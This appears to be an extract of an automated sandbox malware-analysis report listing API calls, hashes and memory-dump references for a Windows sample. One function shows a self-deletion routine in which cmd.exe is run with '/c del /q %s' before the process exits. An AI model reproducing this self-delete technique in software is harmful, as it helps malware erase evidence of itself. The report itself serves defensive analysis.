                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: e8734e54c91f60361e5cc4621796bd98fc79e9c79ec98d087c5591e41e6f804d
                                                                      • Instruction ID: 72d40487d1ff84a19924cd19633a438cdb14ad7e7e51fb3a1694f501fbc6e168
                                                                      • Opcode Fuzzy Hash: e8734e54c91f60361e5cc4621796bd98fc79e9c79ec98d087c5591e41e6f804d
                                                                      • Instruction Fuzzy Hash: BBC1C0349006068FCB3ECFA8C594ABABBB5AF07308F14462AD4569B6E2D335ED45CB51
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • EnumSystemLocalesW.KERNEL32(00AC1023,00000001,00000000,?,-00000050,?,00AC1657,00000000,?,?,?,00000055,?), ref: 00AC0F6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: 2a7d2ec998e04eb59878b5e03e99b6421645567dbc0a4343298695679306b3d5
                                                                      • Instruction ID: abb40ffdd6ee184888d6b79469f054d36a43855fc17c33351a4f6900b4ec2cda
                                                                      • Opcode Fuzzy Hash: 2a7d2ec998e04eb59878b5e03e99b6421645567dbc0a4343298695679306b3d5
                                                                      • Instruction Fuzzy Hash: E31129366043019FDB289F78C8A1EBAB792FF80368B19442CE54687A40D775A982C780
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00AC123F,00000000,00000000,?), ref: 00AC14D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 3736152602-0
                                                                      • Opcode ID: c41b6d5d571ee064be14f39e5702916e78768ce813a7f56c091ca64e133cd1c9
                                                                      • Instruction ID: d099de276ec780449543fa4bc4b7c9731792aa444e4a1549ead9bff93e581e5d
                                                                      • Opcode Fuzzy Hash: c41b6d5d571ee064be14f39e5702916e78768ce813a7f56c091ca64e133cd1c9
                                                                      • Instruction Fuzzy Hash: 6901D632704116ABDB285B648905FFB7769EB81354F16442DEC07E3181EE74ED42C690
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • EnumSystemLocalesW.KERNEL32(00AC1276,00000001,00000000,?,-00000050,?,00AC161F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00AC0FE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: fd486f472bdf858a644e3a04cbed8aa256866d16fb5ca5222817869598b9f016
                                                                      • Instruction ID: f339cd6914ab42388030dc57eb10b809586c8befe081407048e38888fc1cf091
                                                                      • Opcode Fuzzy Hash: fd486f472bdf858a644e3a04cbed8aa256866d16fb5ca5222817869598b9f016
                                                                      • Instruction Fuzzy Hash: 7AF0C2362003049FDB245F799881FAABBD5FF80368B06442CFA458B691D6B59C82C790
                                                                      APIs
                                                                        • Part of subcall function 00AB13AA: EnterCriticalSection.KERNEL32(-0002A8A7,?,00AB5FA7,?,00AD5A20,00000008,00AB616B,CE3BFFFF,00AADDC1,?,CE3BFFFF,00AADDC1,00AA112E,?,00AB125E), ref: 00AB13B9
                                                                      • EnumSystemLocalesW.KERNEL32(00AB79AC,00000001,00AD5B40,0000000C,00AB7DE1,00000000), ref: 00AB79F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                      • String ID:
                                                                      • API String ID: 1272433827-0
                                                                      • Opcode ID: a5f22bb406de9f950333bee0621683ce12c4c1c9ca6eda45e1a5c8ede95b7a35
                                                                      • Instruction ID: 2408efec339ea5be0b13f04c728529801cd954cf36dc95fa61b59c3a06bedea9
                                                                      • Opcode Fuzzy Hash: a5f22bb406de9f950333bee0621683ce12c4c1c9ca6eda45e1a5c8ede95b7a35
                                                                      • Instruction Fuzzy Hash: F2F03732A15204EFD740EFA8E842B9D77F0FB44761F10811BE4129B2E1DBB949018F50
                                                                      APIs
                                                                        • Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
                                                                        • Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375
                                                                      • EnumSystemLocalesW.KERNEL32(00AC0E0B,00000001,00000000,?,?,00AC1679,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC0EE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: 53c23481eaa5a53fac85b3ef1ef6a00fb19ea684a6700089dd65effc008897eb
                                                                      • Instruction ID: 18e3637229329ac070a6967dfed34344c5b4e8cf886c15889466ae58a0c3c12a
                                                                      • Opcode Fuzzy Hash: 53c23481eaa5a53fac85b3ef1ef6a00fb19ea684a6700089dd65effc008897eb
                                                                      • Instruction Fuzzy Hash: 23F0553638020497CB04AF79D845FAA7F94FFC1724B0B045DEA098B290C6359843CB90
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00AB4C4F,?,20001004,00000000,00000002,?,?,00AB4241), ref: 00AB7F19
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 0627843deb7cd1633c905e81cf438a1441d33583bc37ae4f5d2d4380fb0cb4f0
                                                                      • Instruction ID: 1e8095c81bd820452a5f261beee82664b73e1a2213345e38b2248a435e77ac3c
                                                                      • Opcode Fuzzy Hash: 0627843deb7cd1633c905e81cf438a1441d33583bc37ae4f5d2d4380fb0cb4f0
                                                                      • Instruction Fuzzy Hash: 5BE01A31504118BBCB126F61DD05EEE7A6AEB84760F054010F90565222CB758D22AA98
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A646,00AA9E2B), ref: 00AAA63F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 893a3abeb54da8653dc27bf25ae95ac4664a69d3f4f8e2d8f14431a0b2b1ac3c
                                                                      • Instruction ID: 73d6f7191fa016e7e1288707d633eefc2548947057ad2c19a2a05c3918c885d2
                                                                      • Opcode Fuzzy Hash: 893a3abeb54da8653dc27bf25ae95ac4664a69d3f4f8e2d8f14431a0b2b1ac3c
                                                                      • Instruction Fuzzy Hash:
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: 1ec078eb3cc9ea61e2f571cf302796c0254b66ed353decf3eaf145556afe9655
                                                                      • Instruction ID: de33172362ae38ebd0ddf101b08e76c1b852b69e3a6fad926545106cfc46eaa1
                                                                      • Opcode Fuzzy Hash: 1ec078eb3cc9ea61e2f571cf302796c0254b66ed353decf3eaf145556afe9655
                                                                      • Instruction Fuzzy Hash: 4DA01130202200CF8300CFBAAA082083BBABB002C0B02802AA002C02A0EE2882028F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d8d4b62d8ed93f8ac65190b4edcf077bb6f7da257b6763cde11f8f07facc976
                                                                      • Instruction ID: cc81c15cb894a8619e6087453d1a1d85a435331a86de0e211a906b816b1f0f44
                                                                      • Opcode Fuzzy Hash: 8d8d4b62d8ed93f8ac65190b4edcf077bb6f7da257b6763cde11f8f07facc976
                                                                      • Instruction Fuzzy Hash: 8D321532D29F014DD7239639C822735A69DAFB73E4F19D727E81AB59A7EB29C4834100
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: 7e9a5873d1a704cd0066701f947d0fd6cb5595deffc8012f0f4c82ef78e46605
                                                                      • Instruction ID: a4f5ecf6cb6be49221c380b9bfc8242defa43418de9f170c017ea4c9fcd5aedf
                                                                      • Opcode Fuzzy Hash: 7e9a5873d1a704cd0066701f947d0fd6cb5595deffc8012f0f4c82ef78e46605
                                                                      • Instruction Fuzzy Hash: 99B1F435500701DBDB38AB64CD92FBBB3E8EF44308F55856DE987C6681EAB5A985CB00
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000100), ref: 00AA2E3E
                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 00AA2E45
                                                                      • GetCurrentThread.KERNEL32 ref: 00AA2E4D
                                                                      • SetThreadPriority.KERNEL32(00000000), ref: 00AA2E54
                                                                      • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00AA2E68
                                                                      • _fwprintf.LIBCONCRTD ref: 00AA2E82
                                                                        • Part of subcall function 00AA1170: _fread.LIBCMTD ref: 00AA118A
                                                                      • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00AA2EA1
                                                                      • ExitProcess.KERNEL32 ref: 00AA2EA9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
                                                                      • String ID: /c del /q %s$cmd.exe$open
                                                                      • API String ID: 809167050-3932901086
                                                                      • Opcode ID: e7253cdfd11a163e7ee6ad0fd40e28f50e5a237c0dd5f645b0031db114c93fee
                                                                      • Instruction ID: 3794ecc621d4e192c3464a35b9e1831d2f631ac40fb19244994132a5e7a2f0c8
                                                                      • Opcode Fuzzy Hash: e7253cdfd11a163e7ee6ad0fd40e28f50e5a237c0dd5f645b0031db114c93fee
                                                                      • Instruction Fuzzy Hash: 71F01275A843047FE751E7E09C4FFA93668BB08B02F450414B706991D1DEF815498B62
                                                                      APIs
                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00AACE75
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00AACE97
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00AACFA6
                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00AAD078
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00AAD0FC
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00AAD117
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 2123188842-393685449
                                                                      • Opcode ID: 4430e7d7d6cc20c160529919d7d780c399869618c42f0927b5880625f548da22
                                                                      • Instruction ID: 76256565008bd831f472e5b776ac0c83df4d4b030989fcee5d093ff8fbc934d4
                                                                      • Opcode Fuzzy Hash: 4430e7d7d6cc20c160529919d7d780c399869618c42f0927b5880625f548da22
                                                                      • Instruction Fuzzy Hash: 1DB1AE71800209EFDF29DFA4C9819AEBBB5FF16320F10415AF8526B692D731DE52CB91
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3904239083-1405518554
                                                                      • Opcode ID: 985fdb65d7aba32b97c091c9f9ca5c5042721ea36a9fd32466750d2559f6b6be
                                                                      • Instruction ID: 07ebcea1315093f752e869b6792ecc0a8beceb116f56604033cf2ff23fd24d07
                                                                      • Opcode Fuzzy Hash: 985fdb65d7aba32b97c091c9f9ca5c5042721ea36a9fd32466750d2559f6b6be
                                                                      • Instruction Fuzzy Hash: A4116D70904289EFCB04EF98CA55BAEBB75BF46718F14455CF4122B3C2CBB55A00C761
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00910FD0,00910FD0,?,7FFFFFFF,?,00AC656A,00910FD0,00910FD0,?,00910FD0,?,?,?,?,00910FD0,?), ref: 00AC6340
                                                                      • __alloca_probe_16.LIBCMT ref: 00AC63FB
                                                                      • __alloca_probe_16.LIBCMT ref: 00AC648A
                                                                      • __freea.LIBCMT ref: 00AC64D5
                                                                      • __freea.LIBCMT ref: 00AC64DB
                                                                      • __freea.LIBCMT ref: 00AC6511
                                                                      • __freea.LIBCMT ref: 00AC6517
                                                                      • __freea.LIBCMT ref: 00AC6527
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                      • String ID:
                                                                      • API String ID: 127012223-0
                                                                      • Opcode ID: aab46623fa4e629944dd3baf6e5e5f9f43d2eaf59436be177c93b768ba5bb26a
                                                                      • Instruction ID: b377e1135308811839682d8d538c0d802cdd07f38098985c8d21341223e67cf6
                                                                      • Opcode Fuzzy Hash: aab46623fa4e629944dd3baf6e5e5f9f43d2eaf59436be177c93b768ba5bb26a
                                                                      • Instruction Fuzzy Hash: 8971B372904259ABDF21DF948E41FEE7BF9AF49310F2A005DE915AB282DB35DC00C791
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00AA9B6C
                                                                      • __alloca_probe_16.LIBCMT ref: 00AA9B98
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00AA9BD7
                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AA9BF4
                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00AA9C33
                                                                      • __alloca_probe_16.LIBCMT ref: 00AA9C50
                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AA9C92
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AA9CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                      • String ID:
                                                                      • API String ID: 2040435927-0
                                                                      • Opcode ID: 82748777e13bc84514f96479933fbcb464b23cc85c5e7d29593b22b37a80673f
                                                                      • Instruction ID: 95cba7d6d50dcb82e73f9c36eda9e47169af654e722d189badecf7bc1654455b
                                                                      • Opcode Fuzzy Hash: 82748777e13bc84514f96479933fbcb464b23cc85c5e7d29593b22b37a80673f
                                                                      • Instruction Fuzzy Hash: A3519D7250061AEFEB219FA0DC85FAB7BF9EB46760F114129F915A71A0DB35CC10CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
